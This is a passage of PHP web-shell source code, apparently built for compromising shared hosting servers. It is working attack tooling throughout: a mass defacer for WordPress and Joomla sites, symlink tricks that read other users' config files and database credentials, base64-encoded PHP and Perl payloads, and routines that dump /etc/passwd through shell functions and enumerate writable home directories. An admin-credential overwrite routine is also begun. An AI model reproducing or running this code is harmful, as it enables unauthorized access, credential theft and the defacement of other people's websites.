curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  816. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  817. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  818. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  819. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  820. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  821. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  822. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  823. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  824. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  825. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  826. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  827. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
  828. }
  829. } elseif($_GET['do'] == 'symser'){
  830. $d0mains = @file("/etc/named.conf");
  831. if($d0mains){@mkdir("/3c",0777);@chdir("/3c");@exe("ln -s / root");$file3 = 'Options all
  832. DirectoryIndex Sux.html
  833. AddType text/plain .php
  834. AddHandler server-parsed .php
  835. AddType text/plain .html
  836. AddHandler txt .html
  837. Require None
  838. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all
  839. DirectoryIndex Sux.html
  840. AddType text/plain .php
  841. AddHandler server-parsed .php
  842. AddType text/plain .html
  843. AddHandler txt .html
  844. Require None
  845. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
  846. DirectoryIndex Sux.html
  847. AddType text/plain .php
  848. AddHandler server-parsed .php
  849. AddType text/plain .html
  850. AddHandler txt .html
  851. Require None
  852. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}}
  853. elseif($_GET['do'] == 'jumping') {
  854. $i = 0;
  855. echo "<div class='margin: 5px auto;'>";
  856. if(preg_match("/hsphere/", $dir)) {
  857. $urls = explode("\r\n", $_POST['url']);
  858. if(isset($_POST['jump'])) {
  859. echo "<pre>";
  860. foreach($urls as $url) {
  861. $url = str_replace(array("http://","www."), "", strtolower($url));
  862. $etc = "/etc/passwd";
  863. $f = fopen($etc,"r");
  864. while($gets = fgets($f)) {
  865. $pecah = explode(":", $gets);
  866. $user = $pecah[0];
  867. $dir_user = "/hsphere/local/home/$user";
  868. if(is_dir($dir_user) === true) {
  869. $url_user = $dir_user."/".$url;
  870. if(is_readable($url_user)) {
  871. $i++;
  872. $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$url_user'><font color=gold>$url_user</font></a>";
  873. if(is_writable($url_user)) {
  874. $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$url_user'><font color=gold>$url_user</font></a>";
  875. }
  876. echo $jrw."<br>";
  877. }
  878. }
  879. }
  880. }
  881. if($i == 0) {
  882. } else {
  883. echo "<br>Total ada ".$i." Kamar di ".$ip;
  884. }
  885. echo "</pre>";
  886. } else {
  887. echo '<center>
  888. <form method="post">
  889. List Domains: <br>
  890. <textarea name="url" style="width: 500px; height: 250px;">';
  891. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  892. while($getss = fgets($fp)) {
  893. echo $getss;
  894. }
  895. echo '</textarea><br>
  896. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  897. </form></center>';
  898. }
  899. } elseif(preg_match("/vhosts/", $dir)) {
  900. $urls = explode("\r\n", $_POST['url']);
  901. if(isset($_POST['jump'])) {
  902. echo "<pre>";
  903. foreach($urls as $url) {
  904. $web_vh = "/var/www/vhosts/$url/httpdocs";
  905. if(is_dir($web_vh) === true) {
  906. if(is_readable($web_vh)) {
  907. $i++;
  908. $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
  909. if(is_writable($web_vh)) {
  910. $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
  911. }
  912. echo $jrw."<br>";
  913. }
  914. }
  915. }
  916. if($i == 0) {
  917. } else {
  918. echo "<br>Total ada ".$i." Kamar di ".$ip;
  919. }
  920. echo "</pre>";
  921. } else {
  922. echo '<center>
  923. <form method="post">
  924. List Domains: <br>
  925. <textarea name="url" style="width: 500px; height: 250px;">';
  926. bing("ip:$ip");
  927. echo '</textarea><br>
  928. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  929. </form></center>';
  930. }
  931. } else {
  932. echo "<pre>";
  933. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  934. while($passwd = fgets($etc)) {
  935. if($passwd == '' || !$etc) {
  936. echo "<font color=red>Can't read /etc/passwd</font>";
  937. } else {
  938. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  939. foreach($user_jumping[1] as $user_ec_jump) {
  940. $user_jumping_dir = "/home/$user_ec_jump/public_html";
  941. if(is_readable($user_jumping_dir)) {
  942. $i++;
  943. $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  944. if(is_writable($user_jumping_dir)) {
  945. $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  946. }
  947. echo $jrw;
  948. if(function_exists('posix_getpwuid')) {
  949. $domain_jump = file_get_contents("/etc/named.conf");
  950. if($domain_jump == '') {
  951. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  952. } else {
  953. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  954. foreach($domains_jump[1] as $dj) {
  955. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  956. $user_jumping_url = $user_jumping_url['name'];
  957. if($user_jumping_url == $user_ec_jump) {
  958. echo " => ( <u>$dj</u> )<br>";
  959. break;
  960. }
  961. }
  962. }
  963. } else {
  964. echo "<br>";
  965. }
  966. }
  967. }
  968. }
  969. }
  970. if($i == 0) {
  971. } else {
  972. echo "<br>Total ada ".$i." Kamar di ".$ip;
  973. }
  974. echo "</pre>";
  975. }
  976. echo "</div>";
  977. } elseif($_GET['do'] == 'etcpler'){
  978. echo "<center>Bypass etc/passw With:<br>
  979. <table style='width:50%' align='center'>
  980. <tr>
  981. <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
  982. <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
  983. <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
  984. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
  985. <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
  986. </tr></table><center>Bypass User With : <table style='width:50%' align='center'>
  987. <tr>
  988. <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
  989. <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
  990. <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
  991. <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
  992. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
  993. </tr>
  994. </table></center><br>";
  995. if ($_POST['awkuser']) {
  996. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  997. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  998. echo "</textarea><br>";
  999. }
  1000. if ($_POST['systuser']) {
  1001. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1002. echo system("ls /var/mail");
  1003. echo "</textarea><br>";
  1004. }
  1005. if ($_POST['passthuser']) {
  1006. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1007. echo passthru("ls /var/mail");
  1008. echo "</textarea><br>";
  1009. }
  1010. if ($_POST['exuser']) {
  1011. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1012. echo exec("ls /var/mail");
  1013. echo "</textarea><br>";
  1014. }
  1015. if ($_POST['shexuser']) {
  1016. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1017. echo shell_exec("ls /var/mail");
  1018. echo "</textarea><br>";
  1019. }
  1020. if($_POST['syst'])
  1021. {
  1022. echo"<textarea class='inputz' cols='65' rows='15'>";
  1023. echo system("cat /etc/passwd");
  1024. echo"</textarea><br><br><b></b><br>";
  1025. }
  1026. if($_POST['passth'])
  1027. {
  1028. echo"<textarea class='inputz' cols='65' rows='15'>";
  1029. echo passthru("cat /etc/passwd");
  1030. echo"</textarea><br><br><b></b><br>";
  1031. }
  1032. if($_POST['ex'])
  1033. {
  1034. echo"<textarea class='inputz' cols='65' rows='15'>";
  1035. echo exec("cat /etc/passwd");
  1036. echo"</textarea><br><br><b></b><br>";
  1037. }
  1038. if($_POST['shex'])
  1039. {
  1040. echo"<textarea class='inputz' cols='65' rows='15'>";
  1041. echo shell_exec("cat /etc/passwd");
  1042. echo"</textarea><br><br><b></b><br>";
  1043. }
  1044. echo '<center>';
  1045. if($_POST['melex'])
  1046. {
  1047. echo"<textarea class='inputz' cols='65' rows='15'>";
  1048. for($uid=0;$uid<60000;$uid++){
  1049. $ara = posix_getpwuid($uid);
  1050. if (!empty($ara)) {
  1051. while (list ($key, $val) = each($ara)){
  1052. print "$val:";
  1053. }
  1054. print "\n";
  1055. }
  1056. }
  1057. echo"</textarea><br><br>";
  1058. }
  1059. } elseif($_GET['do'] == 'auto_edit_user') {
  1060. if($_POST['hajar']) {
  1061. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1062. echo "username atau password harus lebih dari 6 karakter";
  1063. } else {
  1064. $user_baru = $_POST['user_baru'];
  1065. $pass_baru = md5($_POST['pass_baru']);
  1066. $conf = $_POST['config_dir'];
  1067. $scan_conf = scandir($conf);
  1068. foreach($scan_conf as $file_conf) {
  1069. if(!is_file("$conf/$file_conf")) continue;
  1070. $config = file_get_contents("$conf/$file_conf");
  1071. if(preg_match("/JConfig|joomla/",$config)) {
  1072. $dbhost = ambilkata($config,"host = '","'");
  1073. $dbuser = ambilkata($config,"user = '","'");
  1074. $dbpass = ambilkata($config,"password = '","'");
